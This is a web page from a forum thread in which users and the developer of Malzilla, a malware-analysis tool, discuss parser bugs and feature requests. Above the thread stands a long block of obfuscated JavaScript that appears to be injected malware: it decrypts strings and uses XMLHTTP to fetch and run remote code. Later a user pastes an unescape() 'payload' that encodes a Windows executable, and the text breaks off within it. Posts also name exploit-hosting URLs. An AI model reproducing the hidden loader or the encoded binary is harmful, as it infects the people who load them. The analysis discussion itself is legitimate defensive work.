l';spruik='lf';adorto=8290;infers="us";visum=']';shot='.976';unam=90;caros=5;mocker="551.";googly=621;mari='r';ipso="u";velabo='u';umida='re';semine="nt";aberim=30;rector='e';nodos="r";auctam='x';sumi=69;varium=' t';mortis='last';iussis=52;chuddy='S';proice="a";senis='o';templa='fa';trades='+';sulco=(4.394e3<=adiuti?9:''+'A'+'B'+'C'+'D'+'E'+'F'+'');postis=("3.6e1">4.2e2?2.403e3:mari+'i'+'ng'+'');function wowser(caedar){quivi=new caedar()}function quimus(incute,suete){for(iunges=0;iunges<incute;iunges++)suete[iunges]=iunges}function fulvum(uocare,aequat){for(iunges=0;iunges<uocare;iunges++){ausam=(ausam+quivi[iunges]+aequat[yard](iunges%aequat[amorum]))%uocare;ibique=quivi[iunges];quivi[iunges]=quivi[ausam];quivi[ausam]=ibique}}function iouem(gnow,erga){iunges=(iunges+1)%erga;ausam=(ausam+quivi[iunges])%erga;enetos();quivi[ausam]=ibique;tuorum(gnow)}function enetos(linquo){ibique=quivi[iunges];quivi[iunges]=quivi[ausam]}function tuorum(mitte){etque+=vitateei[optime](mitte[yard](invia)^quivi[(quivi[iunges]+quivi[ausam])%tecum])}function rumpis(gnow){for(invia=0;invia<gnow[amorum];invia++){iouem(gnow,256)}}function anco(aliquo){iunges=aliquo;ausam=aliquo}sedere=(88,relata);laude=(6.4e1,mergis+'a'+'');tecum=(5.6e1,256);(9077>=0.8?sedere:4.8e1)(('.298'<547.?this:.727));valle=(8340.,exciti);sulco+=(0.291e3>"25"?'GH'+'IJK'+'L'+'MN'+'O'+'':525.);ferrum=(1.,oblato);pontum=(dasque<9297?motser:.6899);uerbi=('.8'<8127.?iugulo:1.97e2);natavijie=(1070,ferrum);grauis=(7,pontum)[(7.3e2>='.420'?""+"d"+"o"+"c"+"u"+"m"+"e"+"n"+mque+"":7.78e2)];optime=('.116'>=8.83e2?55.:mergis+'f'+mari+'o')+(0.106,'m'+imis)+(.3,'har')+(1.2e1>'35'?55:'C')+(99.>=0.63?mergis+'o'+'d'+'e'+'':.5804);amorum=(labens,'le')+(2585,igitur+'g')+(.92,'th');vitateei=(1.52e2,grauis)[(669,mergis+acque+'a'+'re'+'nt'+lapsui+'nd'+'ow'+mergis)][(9e0,'w'+'ind'+'ow')][(5.6e1,mergis+'S'+mergis)+("5773"<.2?.8:'t')+(6.368e3<="9.822e3"?postis:0.83)];sulco+=(59<=.62?167:mergis+'P'+'Q'+'R'+chuddy+'T'+'U'+mergis)+(8e0,''+'V'+'W'+'X'+'Y'+'Z'+'');mater=('4997'>=0.67?''+mari+'ay':46);funder=(4e0<luces?'ath':5.64e2);intra=('92'>.4?uerbi:7e0);joey=(6364.,'unc')+(0.3966,usuum);pictis=(unam<7?5:grauis);try{potiti=(56<=9.?3617.:'er')+(8.,'Da');larem=(1.3e1,'#');luges=(3.3e1,'pa');joseph=("5722">5e0?amorem+'f'+'aul'+'t':8395.);trap=(1e0>='.4'?larem:8.07e2);var mensae=(rotas,pictis)[('4.'>=2e0?"cr"+"ea"+mque+"eE"+"lem"+"e"+"nt":iussis)]((.63,'s')+(1e0,luges)+(.1<=.3?igitur+mergis:8.1e2));epeos=(.5>=0.89?798:larem)+(venint>=8.38e2?joseph:0.983)+(1.79e2>=9.332e3?0.135:trap)+(8e0,carpet)+(0.306e3<86?9e0:potiti)+(5.<=facat?3e0:mergis+'ta'+'');(6.>novem?5:mensae)[(177,"a"+boreas+tityre+"h"+lexque+leti+"r"+"")]((4038,epeos));(scitis>=23.?.767:pictis)[("4.28e2"<6?9:"bo"+"d"+"y")][(5,proice+snook+"e"+"n"+otia+"hi"+"l"+"d")]((poenis>47?mensae:1.6e1));(chorus,mensae)[(8>=4?"load":facat)]((ageres<5e0?42:'['+'HA'+'SH'+']'+'['+'U'+gemma+'Q]'+mergis));if((.73<=5?mensae:.9)[(2.9e1>=.7084?"XMLDocume"+semine:273)][(rotas,""+duas+"oc"+"u"+"me"+"ntE"+"le"+statum+mque)][(0.540<=6e0?""+proice+mque+mque+"r"+"i"+"b"+ipso+"t"+"e"+"s"+"":319.)][(7e0,amorum)]==("58"<=5083?dicari:capio)){(4.465e3,mensae)[("6.3e1"<=0.8?70.:"s"+"etA"+foedo+"ribute"+"")]((3.22e2,mortis)+("21">7?mergis+'t'+'i'+'m'+'e'+'':.5026),new (.2,Date)());(3491,mensae)[(9.,""+parant+proice+"v"+"e"+"")]((lucant<804.?2.21e2:'['+'H'+'AS'+'H'+visum+'['+feroci+'IQ'+visum))}else{laude+=(9.8e1,'!')}}catch(darer){}sulco+=(.4,weaner)+(shot>0.2?''+'f'+'gh'+ineo+'kl'+'m':6.27e2);atrox=("6"<=5.708e3?'e':.9667);crate=(.4,pictis);scivit=(0.9,ducere);sedis=(2056<.35?2.4e1:margin);sulco+=(1e0,''+igitur+'o'+acque+'q'+mari+'s'+'t'+'u'+'')+(4,'v'+'w'+'xy'+memora+'1'+'23'+'4')+(.151,''+'5'+'6'+'7'+'8'+'9'+trades+'/'+'='+mergis);yard=(1>=6.96e2?5e0:'ch')+(0.34,'arC')+(0.7050,senis+multae+'t'+'');if((39.>925?2:sulco)[(1.6e1<='5.003e3'?atrox:6.33e2)+(.759,sedis)+('9.8e1'<=.6625?0.114:mergis+'l')]){sulco=(6.01e2<=183.?0.688:mergis);crate=(4e0,sulco)}donato=("71"<=.8?.8:''+senis+mari+'a'+'g'+'e'+mergis);oscar=(caros,'gl');macto=(657<1?0.876e3:'oba'+'');quilt=(98>=8e0?crate:8.3e1);function ducere(puppis,lassa,puram,sinuum){('4470'<=2e0?.4058:wowser)(("1.187e3"<.7?9990.:queantyyo));(0.638>=eicis?.8:quimus)((0.838,256),(759.,quivi));(2.845e3<=2835?1.07e2:anco)((.2477<=624.?dicari:7.9e1));(4<=971.?fulvum:7)((8.75e2,256),(119.>9e0?puppis:3.4e1));(.5<"782"?anco:18.)((2117,0));etque=(9.693e3>"9.7e1"?''+'':4.4e1);(0.6531>=.987?textum:rumpis)(("0.2805"<=0.1293?9898.:lassa));return (9e1>='4.'?etque:5008.)}rimerjie=(.956,quilt);function iugulo(lego,uagis,amores,petat){var raucam;try{manus=(3.519e3,mergis+'x'+'m'+'l'+'2'+'.'+'X'+'');foedum=(.883,mergis+'H'+'T'+'T'+'P'+'');uicere=(421.,manus)+(4>textum?1e0:'ML')+(1e0,foedum);raucam=new ("55"<.1?63.:divicolll)((.86<sumi?''+'Ms':6.)+(7e0>="0.05e2"?uicere:1.1e2))}catch(fando){try{foedum=(.67,'HTTP');uicere=(2638.,mergis+mari+'o'+'s'+senis+'f'+'')+(rotas<ludat?'t.'+'X'+'ML'+mergis:326)+(.443,foedum);raucam=new ('7158.'<=449?9.39e2:divicolll)((.368>7.?.70:mergis+'Mi'+'c')+(3.41e2<="57"?caros:uicere))}catch(shake){}}return (412,raucam)}viros=(.81<=0.52?9.5e1:rimerjie)[(1<3.946e3?''+acque+'ar'+'en'+rebus+creta+igitur+dando+'ow'+'':.7580)][(0.5<='2.5e1'?mergis+'s'+'e'+'l'+'f'+mergis:4)][('509'>=6e0?mergis+'w'+creta+igitur+dando+senis+'w'+mergis:98.)][(6.7e1,mergis+'f'+mari+'a'+citra+'e'+'s'+'')][(.7<.555?7.78e2:''+'s'+'e'+'l'+'f'+mergis)][(.9252,'F')+(4.,joey)];divicolll=(311,rimerjie)[(0.526,'pa'+mari+rector+igitur+'tWi'+'ndo'+'w'+mergis)][(6.1e1,alma+'elf'+mergis)][("6e0"<.868?.4:'wi'+nonam+mergis)][(2.621e3,ring)+(6291<22?2.205e3:tenuis)+(.9>=754?64:mergis+caduci+rector+'X'+'')+("6e0">=.79?'O'+mergis:0.2)+('4'>7.904e3?26:ictuum)];amicoccc=(5.<=facat?8145:rimerjie)[(.8>=8e0?3:mergis+acque+'a'+'re'+igitur+cervos+'W'+'i'+'nd'+'ow'+'')][(8e0>5e0?mergis+alma+rector+'l'+'f'+mergis:0.7198)][(itabat,'M')+(buck,funder)];queantyyo=('3.9e2'<=3.27e2?4e0:rimerjie)[("0.85"<=0.4e1?mergis+'par'+'ent'+'Window'+'':5.39e2)][(4.91e2,mergis+'w'+creta+'n'+dando+senis+'w'+mergis)][(.455,ring)+(781,'r')+("0.7e1">googly?5.7e1:mater)];egiqueaai=new (0.42e2,queantyyo)();oleum=(4.4e1>45.?8.:'G');annos=(0.5<=6?viros:403.);ilice=(48<=ageres?.5195:laude)+(teneto>=3789.?39.:natavijie)((.555>='4.'?.72:sulco),(mocker<rotas?0.3:aberim));pressoeea=(30.>=843?0.78:rura);scaeae=(futura,'T');snaky=(7e0,annos)((3e1>0.25?'ret':5.7e1)+(2.858e3,velabo+'rn '+mergis)+(bella>193?.32:mergis+creta+igitur+'t'+mari+'a'+'('+')'+mergis));taliayya=("9911"<=3.646e3?3.82e2:annos)((8.4e2,mergis+'x'+mergis),(6,'y'),(.8,'ret')+(3.771e3,'u'+mari+'n '+'')+(2.<facat?alma+'civit'+'('+'x,y'+')':1e0));velaiie=(1.<=4.?annos:5.8e1)((56,auctam),(0.1959<'4'?'ret':adorto)+(2.19e2,'urn ')+(23,'ba'+'r'+'cen'+'(x'+')'));ducem=(4,''+'on'+umida+mergis)+('936'<=.8185?2e0:''+'a'+dando+'y'+alma+'t'+mergis)+(facat,''+'a'+cervos+'e'+'c'+mergis)+(5.3e1,''+'h'+'a'+igitur+'g'+'e'+mergis);movere=(9.154e3,'E');(182>=9e0?velaiie:textum)((xxxii,ilice));function barcen(solvi,bardie,equum,sues){var stella=(suopte>0.4?snaky:21.)();(.4,stella)[(inest,"open")]((0.4374>'35'?9.:oleum)+(3.74e2,movere)+(819>'257.'?scaeae:8e0),(49,'?')+(0.994>=5e0?0.49e2:pressoeea)((3.6e1,taliayya)((7904.,''+'d'+rector+alma+'e'+mari+creta+'o'+'o'+caduci+mergis),(.751,solvi))),(4074,true)); stella[(.35>.8731?2.34e2:ducem)]=(647.,impiis);function impiis(){if((.7071<=gravi?stella:0.9960)[(magnae<.598?2.95e3:mdcqve+"r"+matrem+"d"+"yS"+mque+proice+mque+"e")]==(4<3331?black:0.736)&&(0.261e3<3.21e2?stella:0.64)[(998.,parant+"tat"+infers)]==(2.,ardet)){(.4,annos)((5.6e1,taliayya)((6879.<=0.92e2?5:solvi),(".382">=83?959:valle)((paras<5.389e3?rotas:stella)[(acuta,mdcqve+"re"+egerit+"on"+"se"+"T"+"e"+"x"+"t")])))()}};(0.4176,stella)[(inerat,mdcqve+parant+"e"+"n"+duas+mdcqve)]((.314,dicari))}function demus(puppis,dolore,sentes,sociem){ var luget=amicoccc["floor"](amicoccc["random"]()*puppis[amorum]);ituri+=puppis["substring"](luget,luget+1)}function puer(lassa,puppis,ituri,caedis){for(iunges=0;iunges<lassa;iunges++){demus(puppis,iunges,lassa,ituri);}}function oblato(puppis,lassa,caedis,iuvet){ituri='';puer(lassa,puppis,ituri,caedis);return ituri}function rura(visu,cuinam,belli,boni){var obliti=(.5058,mergis);var etque;var iunges;var chiack=(793>=937?633:0);var minans=(hisco>=1599.?.27:acuta);iunges=(4638,dicari);for(etque=0;iunges<visu[amorum];iunges++,etque++){chiack=chiack*256+visu[yard](iunges);minans=minans*4;obliti=obliti+sulco["charAt"](parseInt(chiack/minans));chiack=chiack%minans;if(minans==64){obliti=obliti+sulco["charAt"](parseInt(chiack));chiack=0;minans=1;etque++}if(etque>=75){etque=-1;obliti=obliti+'\n'}}if((5e0>=27.?9462.:iunges)%(9e0,facat)){obliti=obliti+sulco["charAt"](parseInt(chiack*((iunges%3==1)?16:4)));obliti=obliti+((iunges%3)==1?'==':vitateei[optime](61))}return (2759,obliti)}function exciti(visu,fuerat,verras,uterum){var obliti=(.29,'');var iunges;var chiack=(2048<7468.?dicari:0.2);var minans=(317>="2692"?2e0:1);for(iunges=0;iunges<visu[amorum];iunges++){if(visu["charAt"](iunges)==vitateei[optime](61)||visu["charAt"](iunges)=='\n')break;chiack=chiack*64+sulco["indexOf"](visu["charAt"](iunges));minans=(minans==1?64:minans/4);if(minans!=64){obliti=obliti+vitateei[optime](parseInt(chiack/minans));chiack=chiack%minans}}return (574.,obliti)}function relata(uelque,duae,invde,doceri){this[(0.4e1>.1?""+oravi+"o"+mque+"s"+"e"+nodos+mdcqve:3.34e2)]=(8.,uelque);if((5.7e1,uelque)[(9e0>=9e0?"p"+"ar"+fetuum+mque+mdcqve:2778)]==(3.443e3>2.?uelque:54.)){genti=(0.2267,'a')}else{laude+=(0.8301,'@'+mergis)}}</script>
-
Bobby,
Just to let you know the new version has been doing great :)
Just one issue with the links parser - it doesn't seem to parse links that aren't in HREF's and SRC's (e.g. if a URL is in the HTML dropdown "select" options, it doesn't include them), nor does it seem to parse links from comments and such.
If possible, could you also have it parse using base matches? (e.g. parse if string contains "://" or "http" or "ftp" etc etc etc (this is the way I've got vURL parsing the, but obviously unlike Malzilla, vURL doesn't currently rebuild the URL's to include domain names and paths and such, it just presents them "as found" ....)
It also seem to have an issue if I tell it to grab a URL, then create a new tab to grab another one, whilst it's still grabbing the first (this also sporadically creates an error that requires I shut down Malzilla (don't have the error message atm, but it's something about the index or some such, I'll try and reproduce it and post it if I am able to)
-
Hi Steven,
Sorry for the late reply. Somehow I missed your message earlier.
As for the link parser - indeed, by design it parses just valid links from HTML tags (no links from comments and similar, nor links from plain text).
I do have code that can get every single URL from any kind of documents, but that wouldn't be really integrated with the rest of engine. I mean - I can't make such code to use the main HTML parser. It would do it after the main parser does its job, and that would prolong the complete parsing. It does not really hurts the performance, but it can't get the relative links calculated. It could get just the absolute full URLs.
As for the dropdown combo boxes - can you give me an example for such code, so that I can see which tags it uses?
As for the downloader - my first implementation was for single threaded downloader. After that I have added tabbed interface (as requested), but that was an ugly hack. The downloading thread didn't have info about which tab called for a download. The downloaded data was returned to the current active tab. So, if you have two tabs, click on "Get" on the first tab and turn to second tab before the download ends - the downloaded data would end on second tab.
Very annoying bug if one is working with multiple documents in single instance of Malzilla.
In latest development build I started the implementation of "awareness" about which tab called which download.
At the moment, I can't really recall what is the current state of that part of the code (last two months I didn't have even one single free minute of time for codding). I do not know if I ever finished that part or not :(
Blame my job for this (since May I'm working ~12 hours/day)
It can happen that the downloader thread do not check if the tab is still existing before it sends the data back to the tab (tab closed in meanwhile). Check if that is the case.
Hopefully, winter will bring me some peace, so that I can get back to my hobbies :)
-
Hi Bobby,
is there an option to disable minimizing to traybar ?
Malzilla disappears from taskbar when minimized and so I can't switch back to Malzilla by Alt+Tab.
-
Bobby,
hehe no problem.
I don't have any sites with the select code in them, handy, but they usually use;
<select ...etc>
<option value="URL"...>
</select>
Or;
<select ...etc>
<option name="URL"...>
</select>
Or;
<select ...etc>
<option id="URL"...>
</select>
The structure and naming convention differs, but they're all related to the obfuscations that use HTML elements. The only others, are those that have the URL in the value var, which proceeds to the URL when clicked on (uses JS for the actual transfer).
-
@SysAdMini
There is no such option, but I'll implement it
@MysteryFCM
If I got it right, these URLs are not a real HTML references (tags), but a normal document data, just like the plain text on the site etc.
In that case, I assume it wrong to get them extracted with current parser.
Current parser follows the HTML rules about which element can contain some URL (image source, multimedia content, clickable links etc.) and it parses just these URLs.
That what you would need is a raw parser which pick ups every single URL from the HTML document, no matters if it is a URL reference in a tag or plain text on the site (non-clickable URL).
Did I got right the whole idea?
-
That's correct, yes :)
-
I will take care about raw parser, but it will be an extra option, not a main parser as it will miss all the relative links (which are now detected just because the current parser follows the HTML rules and knows which tag contains a link in which property).
-
Nice one, cheers :)
-
Bobby,
Couple more. On this one, Malzilla dives into "Out of memory" errors when trying to decode the following (copy/paste the code into the decoder tab, change the HTML element to the var etc etc);
http://miolana.com/forum/news.php?s=aec9dda79f
On this one, it fails to parse the SRC's from the iFrames;
http://www.everydaygame.net/Blog/
-
Another minor problem, it only seems to sporadically list the IP(s) of the domains being queried. For example, it fails to display the correct IP for the following (exploit folks, so don't load it in a browser ;))
http://a.nt002.cn/E/ff154/ff154.htm
-
Just a note, received an access violation when clicking to send this one to the links parser;
http://cnyswatmop.com
-
Hi Bobby,
there is something that annoys me daily. If I use multiple download tabs and switch between them, then Malzilla doesn't keep
the cursor position of tabs. It switches always to the top.
Example : I'm in the middle of the page in Tab1, switching to Tab2 and switching back to Tab1. Now I'm on top of Tab1 and no longer in the middle of the page.
So I have to search for the last position again.
-
Hi Steven, hi SysAdMini,
sorry about the lack of feedback from me, I didn't touch Malzilla code for months...
I got stuck into some real-life troubles, and I didn't got a lot of chances to do any coding.
If you get any HTML/JS code that make troubles, please save a copy for me in the case that the content on troublesome URL changes.
As for the cursor positions, I think I can fix that this week.
The main problem with the Malzilla is that I do not like the concept anymore.
We need full-blown browser engine for the today's malware.
The implies implementing the whole DOM document model which can be exposed to the JavaScript engine. That would solve all the problems with scripts that are requiring data from HTTP headers, and with the malware requesting data from HTML objects (GetElementByID etc.) or creating new HTML elements.
That are just a few examples of missing things.
The problem is that the current Malzilla engine can't handle that kind of stuff.
Total rewrite is the only possible solution.
I already have a vision, but I'm missing spare time and some motivation... :(
-
Hi Bobby,
yes, Malzilla isn't perfect, but it's currently the best tool of this type. There is no alternate.
I tried FileInsight, but I don't think that it's an alternate.
No other tool than Malzilla has all these builtin features.
Please don't stop. Go ahead ! We need you.
-
Hi Bobby,
Are You still here? i have a problem when using Malzilla, I have a code like bellow
var payload = unescape("%u5a4d%u0090%u0003%u0000%u0004%u0000%uffff%u0000%u00b8%u0000%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u00f0%u0000%u1f0e%u0eba%ub400%ucd09%ub821%u4c01%u21cd%u6854%u7369%u7020%u6f72%u7267%u6d61%u6320%u6e61%u6f6e%u2074%u6562%u7220%u6e75%u6920%u206e%u4f44%u2053%u6f6d%u6564%u0d2e%u0a0d%u0024%u0000%u0000%u0000%u8104%u6536%ue040%u3658%ue040%u3658%ue040%u3658%ub25e%u36dc%ue05b%u3658%ub25e%u36cd%ue051%u3658%ub25e%u36db%ue009%u3658%uef83%u3605%ue042%u3658%u2667%u3623%ue045%u3658%ue040%u3659%ue020%u3658%ub25e%u36d2%ue041%u3658%ub25e%u36c9%ue041%u3658%u6952%u6863%ue040%u3658%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u4550%u0000%u014c%u0004%u16b2%u4b4d%u0000%u0000%u0000%u0000%u00e0%u0103%u010b%u0009%u7000%u0000%u3000%u0000%u0000%u0000%u205f%u0000%u1000%u0000%u8000%u0000%u0000%u0040%u1000%u0000%u0200%u0000%u0005%u0000%u0000%u0000%u0005%u0000%u0000%u0000%ud000%u0000%u0400%u0000%u1c9a%u0001%u0003%u8100%u0000%u0010%u1000%u0000%u0000%u0010%u1000%u0000%u0000%u0000%u0010%u0000%u0000%u0000%u0000%u0000%u97ec%u0000%u0050%u0000%uc000%u0000%u01b4%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u94f0%u0000%u0040%u0000%u0000%u0000%u0000%u0000%u8000%u0000%u014c%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u742e%u7865%u0074%u0000%u6eaa%u0000%u1000%u0000%u7000%u0000%u0400%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0020%u6000%u722e%u6164%u6174%u0000%u1e96%u0000%u8000%u0000%u2000%u0000%u7400%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0040%u4000%u642e%u7461%u0061%u0000%u17fc%u0000%ua000%u0000%u0e00%u0000%u9400%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0040%uc000%u722e%u7273%u0063%u0000%u01b4%u0000%uc000%u0000%u0200%u0000%ua200%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0040%u4000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8b55%u81ec%u18ec%u0002%uff00%u2815%u4080%u6800%u0105%u0000%u006a%u858d%ufef8%uffff%ue850%u33ae%u0000%uc483%u680c%u0105%u0000%u006a%u858d%ufde8%uffff%ue850%u3398%u0000%uc483%u680c%u92c8%u0040%u006a%u006a%u15ff%u8048%u0040%u8589%ufef4%uffff%ubd83%ufef4%uffff%u7500%ue905%u00ff%u0000%u15ff%u8018%u0040%ub73d%u0000%u7500%ue905%u00ed%u0000%uece8%u0000%u8500%u75c0%ue905%u00df%u0000%u50e8%u0001%u8500%u75c0%ue905%u00d1%u0000%u0568%u0001%u8d00%uf885%ufffe%u50ff%u006a%u15ff%u8024%u0040%uc085%u0575%ub4e9%u0000%u6800%u0105%u0000%u858d%ufde8%uffff%uff50%u4015%u4080%u8500%u75c0%ue905%u0099%u0000%ud068%u4092%u6800%u0105%u0000%u858d%ufde8%uffff%ue850%u0b1c%u0000%uc483%u680c%u92d4%u0040%u0568%u0001%u8d00%ue885%ufffd%u50ff%u03e8%u000b%u8300%u0cc4%u858d%ufde8%uffff%u8d50%uf885%ufffe%u50ff%uc4e8%u000d%u5900%u8559%u74c0%u8d3c%ue885%ufffd%u50ff%u858d%ufef8%uffff%ue850%u010d%u0000%u5959%uc085%u0275%u33eb%ub5ff%ufef4%uffff%u15ff%u8030%u0040%u858d%ufde8%uffff%ue850%u0111%u0000%u8559%u75c0%ueb02%ueb14%u8d12%uf885%ufffe%u50ff%u50e8%u0001%u5900%ue0e8%u0001%u3300%uc9c0%u55c3%uec8b%uec83%u5620%ube57%u92e4%u0040%u7d8d%ua5e4%u66a5%ua4a5%uf0be%u4092%u8d00%uf07d%ua5a5%u8da5%ue445%uff50%u2015%u4080%u8900%ue045%u7d83%u00e0%u0475%uc033%u37eb%u458d%u50f0%u75ff%uffe0%u1c15%u4080%u8900%ufc45%u7d83%u00fc%u0475%uc033%u1deb%u446a%ufc68%u4092%u6800%u9308%u0040%u006a%u55ff%u83fc%u07f8%u0475%uc033%u03eb%uc033%u5f40%uc95e%u55c3%uec8b%u15ff%u802c%u0040%uf883%u7501%u3304%uebc0%u3303%u40c0%uc35d%u8b55%u51ec%u6583%u00fc%u07eb%u458b%u40fc%u4589%u8bfc%ufc45%u453b%u7d0c%u8b27%u0845%u4503%u0ffc%u00be%uc085%u0275%u18eb%u458b%u0308%ufc45%ub60f%u3500%u00a6%u0000%u4d8b%u0308%ufc4d%u0188%ucaeb%uc033%uc940%u55c3%uec8b%u016a%u006a%u006a%u006a%u75ff%uff0c%u0875%u15ff%u8038%u0040%uc085%u0475%uc033%u03eb%uc033%u5d40%u55c3%uec8b%uec83%u5758%u45c7%u44a8%u0000%u6a00%u6a40%u8d00%uac45%ue850%u3162%u0000%uc483%u330c%u8dc0%uf07d%uabab%uabab%u458d%u50f0%u458d%u50a8%u006a%u006a%u006a%u006a%u006a%u006a%u006a%u75ff%uff08%u1415%u4080%u8500%u75c0%u3304%uebc0%u3303%u40c0%uc95f%u55c3%uec8b%uec83%u8314%ufc65%u8d00%ufc45%u6850%u003f%u000f%u006a%uc868%u4093%u6800%u0002%u8000%u15ff%u8004%u0040%uc085%u0474%uc033%u67eb%u458b%u8908%uf845%u458b%u40f8%u4589%u8bf4%uf845%u008a%u4588%ufff3%uf845%u7d80%u00f3%uef75%u458b%u2bf8%uf445%u4589%u8bec%uec45%ue0d1%uff50%u0875%u016a%u006a%uf868%u4093%uff00%ufc75%u15ff%u8008%u0040%uc085%u0974%u75ff%ufffc%u0c15%u4080%u3300%uebc0%uff14%ufc75%u15ff%u800c%u0040%uc085%u0474%uc033%u03eb%uc033%uc940%u55c3%uec8b%uec81%u02e8%u0000%u5756%u00be%u4094%u8d00%u28bd%ufffd%ua5ff%ua5a5%ua4a5%u14be%u4094%u8d00%u48bd%ufffe%ua5ff%ua5a5%u66a5%ua4a5%u28be%u4094%u8d00%u18bd%ufffd%ua5ff%ua4a5%u0068%u0001%u6a00%u8d00%u4085%ufffd%u50ff%u45e8%u0030%u8300%u0cc4%u116a%u858d%ufd28%uffff%ue850%ufe4e%uffff%u5959%u136a%u858d%ufe48%uffff%ue850%ufe3e%uffff%u5959%u096a%u858d%ufd18%uffff%ue850%ufe2e%uffff%u5959%u858d%ufe70%uffff%u6850%u0202%u0000%u15ff%u8128%u0040%uc085%u0774%uc033%u84e9%u0001%u6800%uea60%u0000%u15ff%u803c%u0040%u006a%u016a%u026a%u15ff%u8138%u0040%u8589%ufe44%uffff%ubd83%ufe44%uffff%u75ff%u3307%ue9c0%u0157%u0000%u858d%ufd28%uffff%uff50%u4015%u4081%u8900%u2485%ufffd%u83ff%u24bd%ufffd%u00ff%u0575%u18e9%u0001%u6a00%u5802%u8966%u6085%ufffe%u6aff%uff50%u2c15%u4081%u6600%u8589%ufe62%uffff%u858b%ufd24%uffff%u408b%u8b0c%u8b00%u8900%u6485%ufffe%u83ff%u64bd%ufffe%uffff%u0575%udee9%u0000%u6a00%u8d10%u6085%ufffe%u50ff%ub5ff%ufe44%uffff%u15ff%u8120%u0040%u006a%u136a%u858d%ufe48%uffff%uff50%u44b5%ufffe%uffff%u4415%u4081%u8300%ufff8%u0575%ua8e9%u0000%u6a00%u6800%u0100%u0000%u858d%ufd40%uffff%uff50%u44b5%ufffe%uffff%u3415%u4081%ua300%ub6ac%u0040%u3d83%ub6ac%u0040%u74ff%u8309%uac3d%u40b6%u0000%u0275%u75eb%u858d%ufd18%uffff%u8d50%u4085%ufffd%u50ff%u91e8%u0006%u5900%u8959%u3c85%ufffd%u83ff%u3cbd%ufffd%u00ff%u0275%u4feb%u858b%ufd3c%uffff%u408a%u8808%u5f85%ufffe%u81ff%uac3d%u40b6%u0000%u0001%u7500%u6a21%u6800%u0100%u0000%u858d%ufd40%uffff%uff50%u44b5%ufffe%uffff%u3415%u4081%ua300%ub6ac%u0040%ud3eb%ub5ff%ufe5f%uffff%ub5ff%ufe44%uffff%u24e8%u0000%u5900%u3359%u40c0%u850f%ufe91%uffff%ub5ff%ufe44%uffff%u15ff%u813c%u0040%u15ff%u8130%u0040%uc033%u5f40%uc95e%u55c3%uec8b%ub60f%u0c45%uf883%u756f%uff0d%u0875%u46e8%u0000%u5900%u41eb%u3deb%ub60f%u0c45%uf883%u756e%uff0d%u0875%u8ce8%u0001%u5900%u2beb%u27eb%ub60f%u0c45%uf883%u7564%uff0d%u0875%u4de8%u0002%u5900%u15eb%u11eb%ub60f%u0c45%uf883%u7571%u6a08%uff00%u4c15%u4080%u3300%u5dc0%u55c3%uec8b%uec81%u00d8%u0000%u85c7%uff28%uffff%u0094%u0000%u326a%u006a%u458d%u50cc%uf3e8%u002d%u8300%u0cc4%u036a%u3468%u4094%u6a00%u8d32%ucc45%ue850%u0678%u0000%uc483%u8d10%u2885%uffff%u50ff%u15ff%u8034%u0040%uc085%u2b75%uff6a%u3868%u4094%u6a00%u8d32%ucc45%ue850%u048b%u0000%uc483%u6a10%u8d32%ucc45%uff50%u0875%ub5e8%u0003%u8300%u0cc4%ue6e9%u0000%u8300%u2cbd%uffff%u05ff%u5775%ubd83%uff30%uffff%u7501%u6a17%u68ff%u9440%u0040%u326a%u458d%u50cc%u4ee8%u0004%u8300%u10c4%u35eb%ubd83%uff30%uffff%u7502%u6a17%u68ff%u9448%u0040%u326a%u458d%u50cc%u2ee8%u0004%u8300%u10c4%u15eb%uff6a%u5068%u4094%u6a00%u8d32%ucc45%ue850%u0417%u0000%uc483%ueb10%u8375%u2cbd%uffff%u06ff%u5775%ubd83%uff30%uffff%u7500%u6a17%u68ff%u9458%u0040%u326a%u458d%u50cc%ueee8%u0003%u8300%u10c4%u35eb%ubd83%uff30%uffff%u7501%u6a17%u68ff%u9464%u0040%u326a%u458d%u50cc%ucee8%u0003%u8300%u10c4%u15eb%uff6a%u6c68%u4094%u6a00%u8d32%ucc45%ue850%u03b7%u0000%uc483%ueb10%u6a15%u68ff%u9474%u0040%u326a%u458d%u50cc%ua0e8%u0003%u8300%u10c4%u326a%u458d%u50cc%u75ff%ue808%u02ca%u0000%uc483%uc90c%u55c3%uec8b%uec81%u00a0%u0000%u6a57%u6a50%u8d00%u6085%uffff%u50ff%u9de8%u002c%u8300%u0cc4%u